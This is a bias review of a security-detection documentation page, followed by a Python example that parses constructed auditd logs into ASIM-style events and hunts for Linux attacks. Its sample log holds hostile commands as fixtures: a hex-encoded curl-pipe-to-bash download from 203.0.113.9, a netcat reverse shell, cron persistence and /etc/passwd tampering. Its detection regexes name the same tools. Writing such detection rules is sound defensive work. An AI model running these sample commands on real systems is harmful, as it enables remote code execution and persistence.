Bias Analysis
Detected Bias Types
powershell_heavy
windows_tools
missing_linux_example
windows_first
Summary
The documentation page shows a pronounced Windows bias. Many examples and hunting queries rely on Windows-specific tools (PowerShell, rundll32.exe, certutil, the Exchange PowerShell snap-in), and several analytic rules and queries are written around Windows process activity and registry manipulation. No Linux-specific examples, tools or patterns appear, and neither Linux equivalents nor cross-platform considerations are mentioned anywhere in the document.
Recommendations
- Add Linux-specific analytic rules and hunting queries, such as detection of suspicious shell scripts, cron job persistence, or common Linux malware behaviours.
- Include examples of Linux process activity (e.g., suspicious use of bash, sh, systemd, or common Linux binaries such as curl, wget and netcat) alongside the Windows examples.
- Provide parity for the registry-activity examples by covering their Linux equivalents: tampering with credential and configuration files such as /etc/passwd, /etc/shadow and systemd unit files.
- Balance the PowerShell-heavy examples with Linux shell script or command-line examples (e.g., detection of malicious shell scripts, anomalous sudo use, or abuse of system utilities).
- Explicitly note the cross-platform applicability of ASIM where relevant, and state for each rule or query whether it is Windows-only or platform-agnostic.
- Where possible, reference Linux audit and logging sources (auditd, syslog, journald) and security modules such as SELinux, and show how their logs can be normalized into ASIM and analysed there.
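As an added illustration of the Linux parity recommended above (this is example code written for this analysis, not content from the reviewed page and not Microsoft's ASIM parsers or any shipped Sentinel rule), the Python below joins constructed auditd SYSCALL/EXECVE records into events whose field names follow the ASIM ProcessEvent schema (TargetProcessName, TargetProcessCommandLine, ActingProcessId, ActorUserId, DvcOs) and then runs four Linux counterparts of typical Windows hunts over them: download-and-execute, netcat reverse shell, cron persistence and credential-file tampering. The sample log lines, the parser and the rule regexes are this example's own; each rule is what a KQL analytic rule over the ASIM process table would express as a `where TargetProcessCommandLine matches regex` filter.

```python
"""Added example: Linux-parity process hunting over auditd records.

auditd splits one execve() across a SYSCALL record and an EXECVE record that
share the same msg serial; the normalizer joins them into one event whose
field names follow the ASIM ProcessEvent schema.  Parser, sample log and
rules are this example's own, not Microsoft's ASIM parsers or rules.
"""
import re
import shlex
from collections import defaultdict

# Constructed auditd lines (not a real capture).  auditd hex-encodes any
# argument containing spaces or quotes, as in a2 of serial 201.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0 ppid=1400 pid=1401 uid=1000 exe="/usr/bin/bash" comm="bash"
type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="bash" a1="-c" a2=6375726C202D6673534C20687474703A2F2F3230332E302E3131332E392F732E7368207C2062617368
type=SYSCALL msg=audit(1700000000.102:202): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1402 uid=1000 exe="/usr/bin/nc" comm="nc"
type=EXECVE msg=audit(1700000000.102:202): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="203.0.113.9" a4="4444"
type=SYSCALL msg=audit(1700000000.103:203): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1403 uid=0 exe="/usr/bin/crontab" comm="crontab"
type=EXECVE msg=audit(1700000000.103:203): argc=2 a0="crontab" a1="/tmp/.c"
type=SYSCALL msg=audit(1700000000.104:204): arch=c000003e syscall=59 success=yes exit=0 ppid=1401 pid=1404 uid=0 exe="/usr/bin/tee" comm="tee"
type=EXECVE msg=audit(1700000000.104:204): argc=3 a0="tee" a1="-a" a2="/etc/passwd"
type=SYSCALL msg=audit(1700000000.105:205): arch=c000003e syscall=59 success=yes exit=0 ppid=1400 pid=1405 uid=1000 exe="/usr/bin/curl" comm="curl"
type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="curl" a1="-O" a2="https://example.org/index.html"
"""

AUDIT_RE = re.compile(r'^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
EXECVE_SYSCALLS = {'59', '322'}  # execve / execveat on x86_64 (arch=c000003e); numbers are arch-specific


def decode_audit_string(value):
    """Plain auditd strings are double-quoted; strings with spaces, quotes or
    non-printable bytes are emitted unquoted as hex.  Call this only on string
    fields (exe, comm, aN), never on numeric ones such as pid."""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1]
    if len(value) % 2 == 0 and re.fullmatch(r'[0-9A-Fa-f]+', value):
        return bytes.fromhex(value).decode('utf-8', 'replace')
    return value


def normalize_auditd(log_text):
    """Join SYSCALL+EXECVE records by serial into ASIM ProcessEvent-style dicts."""
    by_serial = defaultdict(dict)
    for line in log_text.splitlines():
        m = AUDIT_RE.match(line)
        if not m:
            continue
        fields = dict(KV_RE.findall(m.group('body')))
        ev = by_serial[m.group('serial')]
        ev.setdefault('TimeGenerated', float(m.group('ts')))
        if m.group('type') == 'SYSCALL' and fields.get('syscall') in EXECVE_SYSCALLS:
            ev.update({
                'EventType': 'ProcessCreated',
                'EventResult': 'Success' if fields.get('success') == 'yes' else 'Failure',
                'TargetProcessId': fields.get('pid'),
                'ActingProcessId': fields.get('ppid'),
                'ActorUserId': fields.get('uid'),
                'TargetProcessName': decode_audit_string(fields.get('exe', '')),
                'DvcOs': 'Linux',
            })
        elif m.group('type') == 'EXECVE':
            argv = [decode_audit_string(fields[f'a{i}'])
                    for i in range(int(fields.get('argc', 0))) if f'a{i}' in fields]
            # shlex.join re-quotes arguments that contained whitespace, so the
            # rendered command line is unambiguous and still regex-searchable.
            ev['TargetProcessCommandLine'] = shlex.join(argv)
    return [ev for ev in by_serial.values() if ev.get('EventType') == 'ProcessCreated']


# Linux counterparts of common Windows-centric hunts: certutil/rundll32-style
# download-and-run, LOLBin reverse shells, scheduled-task persistence and
# local credential-store tampering.  'crontab -l' (listing) is deliberately excluded.
LINUX_RULES = {
    'download_and_execute': re.compile(r'\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b'),
    'netcat_reverse_shell': re.compile(r'\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba)?sh\b|/dev/tcp/'),
    'cron_persistence': re.compile(r'\bcrontab\s+(?!-l\b)|/etc/cron\.(d|hourly|daily)/|/var/spool/cron/'),
    'credential_file_tamper': re.compile(r'\b(tee|sed|vim?|nano|cp|mv)\b.*/etc/(passwd|shadow|sudoers)\b'),
}


def hunt(events, rules=LINUX_RULES):
    """Return (rule, TargetProcessId) pairs.  The DvcOs filter is what keeps a
    Linux-only rule set from firing on Windows events in a shared ASIM table."""
    hits = []
    for ev in events:
        if ev.get('DvcOs') != 'Linux':
            continue
        cmd = ev.get('TargetProcessCommandLine', '')
        for name, rx in rules.items():
            if rx.search(cmd):
                hits.append((name, ev['TargetProcessId']))
    return hits


if __name__ == '__main__':
    for rule, pid in hunt(normalize_auditd(SAMPLE_AUDIT_LOG)):
        print(f'{rule:24} pid={pid}')
```

Two details matter when porting this to a real ASIM rule: the execve syscall number differs per architecture, so a production parser keys on the resolved syscall name rather than on 59, and the DvcOs guard is what lets a Linux rule coexist with Windows-only rules in the same normalized table without cross-firing.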